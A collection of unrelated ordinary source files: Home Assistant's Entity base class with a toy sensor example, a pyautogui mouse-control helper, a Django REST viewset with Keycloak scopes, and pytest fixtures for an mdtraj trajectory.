# Owning hass instance. Will be set by EntityPlatform
hass: Optional[HomeAssistant] = None
# Owning platform instance. Will be set by EntityPlatform
platform: Optional[EntityPlatform] = None
# If we reported if this entity was slow
_slow_reported = False
# If we reported this entity is updated while disabled
_disabled_reported = False
# Protect for multiple updates
_update_staged = False
# Process updates in parallel
parallel_updates: Optional[asyncio.Semaphore] = None
# Entry in the entity registry
registry_entry: Optional[RegistryEntry] = None
# Hold list for functions to call on remove.
_on_remove: Optional[List[CALLBACK_TYPE]] = None
# Context
_context: Optional[Context] = None
_context_set: Optional[datetime] = None
# If entity is added to an entity platform
_added = False
@property
def should_poll(self) -> bool:
"""Return True if entity has to be polled for state.
False if entity pushes its state to HA.
"""
return True
@property
def unique_id(self) -> Optional[str]:
"""Return a unique ID."""
return None
@property
def name(self) -> Optional[str]:
"""Return the name of the entity."""
return None
@property
def state(self) -> StateType:
"""Return the state of the entity."""
return STATE_UNKNOWN
@property
def capability_attributes(self) -> Optional[Dict[str, Any]]:
"""Return the capability attributes.
Attributes that explain the capabilities of an entity.
Implemented by component base class. Convention for attribute names
is lowercase snake_case.
"""
return None
@property
def state_attributes(self) -> Optional[Dict[str, Any]]:
"""Return the state attributes.
Implemented by component base class. Convention for attribute names
is lowercase snake_case.
"""
return None
@property
def device_state_attributes(self) -> Optional[Dict[str, Any]]:
"""Return device specific state attributes.
Implemented by platform classes. Convention for attribute names
is lowercase snake_case.
"""
return None
@property
def device_info(self) -> Optional[Dict[str, Any]]:
"""Return device specific attributes.
Implemented by platform classes.
"""
return None
@property
def device_class(self) -> Optional[str]:
"""Return the class of this device, from component DEVICE_CLASSES."""
return None
@property
def unit_of_measurement(self) -> Optional[str]:
"""Return the unit of measurement of this entity, if any."""
return None
@property
def icon(self) -> Optional[str]:
"""Return the icon to use in the frontend, if any."""
return None
@property
def entity_picture(self) -> Optional[str]:
"""Return the entity picture to use in the frontend, if any."""
return None
@property
def available(self) -> bool:
"""Return True if entity is available."""
return True
@property
def assumed_state(self) -> bool:
"""Return True if unable to access real state of the entity."""
return False
@property
def force_update(self) -> bool:
"""Return True if state updates should be forced.
If True, a state change will be triggered anytime the state property is
updated, not just when the value changes.
"""
return False
@property
def supported_features(self) -> Optional[int]:
"""Flag supported features."""
return None
@property
def context_recent_time(self) -> timedelta:
"""Time that a context is considered recent."""
return timedelta(seconds=5)
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
return True
# DO NOT OVERWRITE
# These properties and methods are either managed by Home Assistant or they
# are used to perform a very specific function. Overwriting these may
# produce undesirable effects in the entity's operation.
@property
def enabled(self) -> bool:
"""Return if the entity is enabled in the entity registry.
If an entity is not part of the registry, it cannot be disabled
and will therefore always be enabled.
"""
return self.registry_entry is None or not self.registry_entry.disabled
@callback
def async_set_context(self, context: Context) -> None:
"""Set the context the entity currently operates under."""
self._context = context
self._context_set = dt_util.utcnow()
async def async_update_ha_state(self, force_refresh: bool = False) -> None:
"""Update Home Assistant with current state of entity.
If force_refresh == True will update entity before setting state.
This method must be run in the event loop.
"""
if self.hass is None:
raise RuntimeError(f"Attribute hass is None for {self}")
if self.entity_id is None:
raise NoEntitySpecifiedError(
f"No entity id specified for entity {self.name}"
)
# update entity data
if force_refresh:
try:
await self.async_device_update()
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Update for %s fails", self.entity_id)
return
self._async_write_ha_state()
@callback
def async_write_ha_state(self) -> None:
"""Write the state to the state machine."""
if self.hass is None:
raise RuntimeError(f"Attribute hass is None for {self}")
if self.entity_id is None:
raise NoEntitySpecifiedError(
f"No entity id specified for entity {self.name}"
)
self._async_write_ha_state()
@callback
def _async_write_ha_state(self) -> None:
"""Write the state to the state machine."""
if self.registry_entry and self.registry_entry.disabled_by:
if not self._disabled_reported:
self._disabled_reported = True
assert self.platform is not None
_LOGGER.warning(
"Entity %s is incorrectly being triggered for updates while it is disabled. This is a bug in the %s integration",
self.entity_id,
self.platform.platform_name,
)
return
start = timer()
attr = self.capability_attributes
attr = dict(attr) if attr else {}
if not self.available:
state = STATE_UNAVAILABLE
else:
sstate = self.state
state = STATE_UNKNOWN if sstate is None else str(sstate)
attr.update(self.state_attributes or {})
attr.update(self.device_state_attributes or {})
unit_of_measurement = self.unit_of_measurement
if unit_of_measurement is not None:
attr[ATTR_UNIT_OF_MEASUREMENT] = unit_of_measurement
entry = self.registry_entry
# pylint: disable=consider-using-ternary
name = (entry and entry.name) or self.name
if name is not None:
attr[ATTR_FRIENDLY_NAME] = name
icon = (entry and entry.icon) or self.icon
if icon is not None:
attr[ATTR_ICON] = icon
entity_picture = self.entity_picture
if entity_picture is not None:
attr[ATTR_ENTITY_PICTURE] = entity_picture
assumed_state = self.assumed_state
if assumed_state:
attr[ATTR_ASSUMED_STATE] = assumed_state
supported_features = self.supported_features
if supported_features is not None:
attr[ATTR_SUPPORTED_FEATURES] = supported_features
device_class = self.device_class
if device_class is not None:
attr[ATTR_DEVICE_CLASS] = str(device_class)
end = timer()
if end - start > 0.4 and not self._slow_reported:
self._slow_reported = True
extra = ""
if "custom_components" in type(self).__module__:
extra = "Please report it to the custom component author."
else:
extra = (
"Please create a bug report at "
"https://github.com/home-assistant/core/issues?q=is%3Aopen+is%3Aissue"
)
if self.platform:
extra += (
f"+label%3A%22integration%3A+{self.platform.platform_name}%22"
)
_LOGGER.warning(
"Updating state for %s (%s) took %.3f seconds. %s",
self.entity_id,
type(self),
end - start,
extra,
)
# Overwrite properties that have been set in the config file.
assert self.hass is not None
if DATA_CUSTOMIZE in self.hass.data:
attr.update(self.hass.data[DATA_CUSTOMIZE].get(self.entity_id))
# Convert temperature if we detect one
try:
unit_of_measure = attr.get(ATTR_UNIT_OF_MEASUREMENT)
units = self.hass.config.units
if (
unit_of_measure in (TEMP_CELSIUS, TEMP_FAHRENHEIT)
and unit_of_measure != units.temperature_unit
):
prec = len(state) - state.index(".") - 1 if "." in state else 0
temp = units.temperature(float(state), unit_of_measure)
state = str(round(temp) if prec == 0 else round(temp, prec))
attr[ATTR_UNIT_OF_MEASUREMENT] = units.temperature_unit
except ValueError:
# Could not convert state to float
pass
if (
self._context_set is not None
and dt_util.utcnow() - self._context_set > self.context_recent_time
):
self._context = None
self._context_set = None
self.hass.states.async_set(
self.entity_id, state, attr, self.force_update, self._context
)
def schedule_update_ha_state(self, force_refresh: bool = False) -> None:
"""Schedule an update ha state change task.
Scheduling the update avoids executor deadlocks.
Entity state and attributes are read when the update ha state change
task is executed.
If state is changed more than once before the ha state change task has
been executed, the intermediate state transitions will be missed.
"""
assert self.hass is not None
self.hass.add_job(self.async_update_ha_state(force_refresh)) # type: ignore
@callback
def async_schedule_update_ha_state(self, force_refresh: bool = False) -> None:
"""Schedule an update ha state change task.
This method must be run in the event loop.
Scheduling the update avoids executor deadlocks.
Entity state and attributes are read when the update ha state change
task is executed.
If state is changed more than once before the ha state change task has
been executed, the intermediate state transitions will be missed.
"""
if force_refresh:
assert self.hass is not None
self.hass.async_create_task(self.async_update_ha_state(force_refresh))
else:
self.async_write_ha_state()
async def async_device_update(self, warning: bool = True) -> None:
"""Process 'update' or 'async_update' from entity.
This method is a coroutine.
"""
if self._update_staged:
return
self._update_staged = True
# Process update sequential
if self.parallel_updates:
await self.parallel_updates.acquire()
try:
# pylint: disable=no-member
if hasattr(self, "async_update"):
task = self.hass.async_create_task(self.async_update()) # type: ignore
elif hasattr(self, "update"):
task = self.hass.async_add_executor_job(self.update) # type: ignore
else:
return
if not warning:
await task
return
finished, _ = await asyncio.wait([task], timeout=SLOW_UPDATE_WARNING)
for done in finished:
exc = done.exception()
if exc:
raise exc
return
_LOGGER.warning(
"Update of %s is taking over %s seconds",
self.entity_id,
SLOW_UPDATE_WARNING,
)
await task
finally:
self._update_staged = False
if self.parallel_updates:
self.parallel_updates.release()
@callback
def async_on_remove(self, func: CALLBACK_TYPE) -> None:
"""Add a function to call when entity removed."""
if self._on_remove is None:
self._on_remove = []
self._on_remove.append(func)
async def async_removed_from_registry(self) -> None:
"""Run when entity has been removed from entity registry.
To be extended by integrations.
"""
@callback
def add_to_platform_start(
self,
hass: HomeAssistant,
platform: EntityPlatform,
parallel_updates: Optional[asyncio.Semaphore],
) -> None:
"""Start adding an entity to a platform."""
if self._added:
raise HomeAssistantError(
f"Entity {self.entity_id} cannot be added a second time to an entity platform"
)
self.hass = hass
self.platform = platform
self.parallel_updates = parallel_updates
self._added = True
@callback
def add_to_platform_abort(self) -> None:
"""Abort adding an entity to a platform."""
self.hass = None
self.platform = None
self.parallel_updates = None
self._added = False
async def add_to_platform_finish(self) -> None:
"""Finish adding an entity to a platform."""
await self.async_internal_added_to_hass()
await self.async_added_to_hass()
self.async_write_ha_state()
async def async_remove(self, *, force_remove: bool = False) -> None:
"""Remove entity from Home Assistant.
If the entity has a non disabled entry in the entity registry,
the entity's state will be set to unavailable, in the same way
as when the entity registry is loaded.
If the entity doesn't have a non disabled entry in the entity registry,
or if force_remove=True, its state will be removed.
"""
assert self.hass is not None
if self.platform and not self._added:
raise HomeAssistantError(
f"Entity {self.entity_id} async_remove called twice"
)
self._added = False
if self._on_remove is not None:
while self._on_remove:
self._on_remove.pop()()
await self.async_internal_will_remove_from_hass()
await self.async_will_remove_from_hass()
# Check if entry still exists in entity registry (e.g. unloading config entry)
if (
not force_remove
and self.registry_entry
and not self.registry_entry.disabled
):
# Set the entity's state will to unavailable + ATTR_RESTORED: True
self.registry_entry.write_unavailable_state(self.hass)
else:
self.hass.states.async_remove(self.entity_id, context=self._context)
async def async_added_to_hass(self) -> None:
"""Run when entity about to be added to hass.
To be extended by integrations.
"""
async def async_will_remove_from_hass(self) -> None:
"""Run when entity will be removed from hass.
To be extended by integrations.
"""
async def async_internal_added_to_hass(self) -> None:
"""Run when entity about to be added to hass.
Not to be extended by integrations.
"""
assert self.hass is not None
if self.platform:
info = {"domain": self.platform.platform_name}
if self.platform.config_entry:
info["source"] = SOURCE_CONFIG_ENTRY
info["config_entry"] = self.platform.config_entry.entry_id
else:
info["source"] = SOURCE_PLATFORM_CONFIG
self.hass.data.setdefault(DATA_ENTITY_SOURCE, {})[self.entity_id] = info
if self.registry_entry is not None:
# This is an assert as it should never happen, but helps in tests
assert (
not self.registry_entry.disabled_by
), f"Entity {self.entity_id} is being added while it's disabled"
self.async_on_remove(
async_track_entity_registry_updated_event(
self.hass, self.entity_id, self._async_registry_updated
)
)
async def async_internal_will_remove_from_hass(self) -> None:
"""Run when entity will be removed from hass.
Not to be extended by integrations.
"""
if self.platform:
assert self.hass is not None
self.hass.data[DATA_ENTITY_SOURCE].pop(self.entity_id)
async def _async_registry_updated(self, event: Event) -> None:
"""Handle entity registry update."""
data = event.data
if data["action"] == "remove":
await self.async_removed_from_registry()
self.registry_entry = None
await self.async_remove()
if data["action"] != "update":
return
assert self.hass is not None
ent_reg = await self.hass.helpers.entity_registry.async_get_registry()
old = self.registry_entry
self.registry_entry = ent_reg.async_get(data["entity_id"])
assert self.registry_entry is not None
if self.registry_entry.disabled:
await self.async_remove()
return
assert old is not None
if self.registry_entry.entity_id == old.entity_id:
self.async_write_ha_state()
return
await self.async_remove(force_remove=True)
assert self.platform is not None
self.entity_id = self.registry_entry.entity_id
await self.platform.async_add_entities([self])
def __eq__(self, other: Any) -> bool:
"""Return the comparison."""
if not isinstance(other, self.__class__):
return False
# Can only decide equality if both have a unique id
if self.unique_id is None or other.unique_id is None:
return False
# Ensure they belong to the same platform
if self.platform is not None or other.platform is not None:
if self.platform is None or other.platform is None:
return False
if self.platform.platform != other.platform.platform:
return False
return self.unique_id == other.unique_id
def __repr__(self) -> str:
"""Return the representation."""
return f"<Entity {self.name}: {self.state}>"
async def async_request_call(self, coro: Awaitable) -> None:
"""Process request batched."""
if self.parallel_updates:
await self.parallel_updates.acquire()
try:
await coro
finally:
if self.parallel_updates:
self.parallel_updates.release()
class ToggleEntity(Entity):
"""An abstract class for entities that can be turned on and off."""
@property
def state(self) -> str:
"""Return the state."""
return STATE_ON if self.is_on else STATE_OFF
@property
def is_on(self) -> bool:
"""Return True if entity is on."""
raise NotImplementedError()
def turn_on(self, **kwargs: Any) -> None:
"""Turn the entity on."""
raise NotImplementedError()
async def async_turn_on(self, **kwargs: Any) -> None:
"""Turn the entity on."""
assert self.hass is not None
await self.hass.async_add_executor_job(ft.partial(self.turn_on, **kwargs))
def turn_off(self, **kwargs: Any) -> None:
"""Turn the entity off."""
raise NotImplementedError()
async def async_turn_off(self, **kwargs: Any) -> None:
"""Turn the entity off."""
assert self.hass is not None
await self.hass.async_add_executor_job(ft.partial(self.turn_off, **kwargs))
def toggle(self, **kwargs: Any) -> None:
"""Toggle the entity."""
if self.is_on:
self.turn_off(**kwargs)
else:
self.turn_on(**kwargs)
async def async_toggle(self, **kwargs: Any) -> None:
"""Toggle the entity."""
if self.is_on:
await self.async_turn_off(**kwargs)
else:
await self.async_turn_on(**kwargs)
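# Illustrative sketch (not part of Home Assistant): a minimal Entity subclass
# showing the properties and update hook an integration typically overrides.
# The sensor name, unit and the hard-coded reading are hypothetical example
# values, not a real integration.
class ExampleTemperatureSensor(Entity):
    """A toy polled sensor used only to demonstrate the Entity API."""

    def __init__(self) -> None:
        self._state: StateType = None

    @property
    def name(self) -> str:
        return "Example Temperature"

    @property
    def unit_of_measurement(self) -> str:
        return TEMP_CELSIUS

    @property
    def state(self) -> StateType:
        return self._state

    async def async_update(self) -> None:
        # A real integration would query a device or a remote API here.
        self._state = 21.5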
|
the-stack_106_14902
|
import pyautogui
import sys
pyautogui.FAILSAFE = False
# PARAMETERS FOR MOVE_MOUSE
# coords - coordinates of where the mouse should be relative to eyes -> tuple
# left_click - if the mouse should left click -> boolean -> wink left eye
# right_click - if the mouse should right click -> boolean -> wink right eye
# dbl_click - if the mouse should double click -> boolean -> blink both eyes twice
# shut_down - if the program should be shut down -> boolean -> shut eyes for prolonged time
def move_mouse(coords, left_click, right_click, dbl_click, shut_down):
if shut_down:
sys.exit()
pyautogui.moveTo(coords)
# Executing clicks
if left_click:
pyautogui.click(button="left")
elif right_click:
pyautogui.click(button="right")
elif dbl_click:
pyautogui.doubleClick()
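# Illustrative usage (hypothetical coordinates): move the cursor to the centre
# of a 1280x720 screen and perform a single left click.
if __name__ == "__main__":
    move_mouse((640, 360), left_click=True, right_click=False,
               dbl_click=False, shut_down=False)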
|
the-stack_106_14903
|
# -*- coding: utf-8 -*-
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors: Luc LEGER / Coopérative ARTEFACTS <[email protected]>
from django.db.models.query import QuerySet
from rest_framework import viewsets
from ..models.collection_informer import (
CollectionInformer as CollectionInformerModel)
from ..serializers.collection_informer import CollectionInformerSerializer
class CollectionInformerViewSet(viewsets.ModelViewSet):
"""
CollectionInformer management
"""
queryset = CollectionInformerModel.objects.all()
serializer_class = CollectionInformerSerializer
keycloak_scopes = {
'GET': 'collection_informer:view',
'POST': 'collection_informer:add',
'PATCH': 'collection_informer:update',
'PUT': 'collection_informer:update',
'DELETE': 'collection_informer:delete'
}
def get_queryset(self):
queryset = self.queryset
if isinstance(queryset, QuerySet):
# Ensure queryset is re-evaluated on each request.
queryset = CollectionInformerModel.objects.filter(
collection_id=self.kwargs['collection_pk'])
return queryset
|
the-stack_106_14905
|
import pytest
import tensorflow as tf
import mdtraj as md
@pytest.fixture(scope='session')
def sess():
sess = tf.Session()
yield sess
sess.close()
@pytest.fixture()
def traj():
t = md.load('fs_peptide/trajectory-9.xtc', top='fs_peptide/fs-peptide.pdb', stride=21)
return t
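# Illustrative sketch (not part of the suite): an example test consuming the
# fixtures above. The assertions only check that the trajectory loaded; no
# specific frame count is assumed.
def test_traj_loads(traj):
    assert traj.n_frames > 0
    assert traj.topology is not None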
|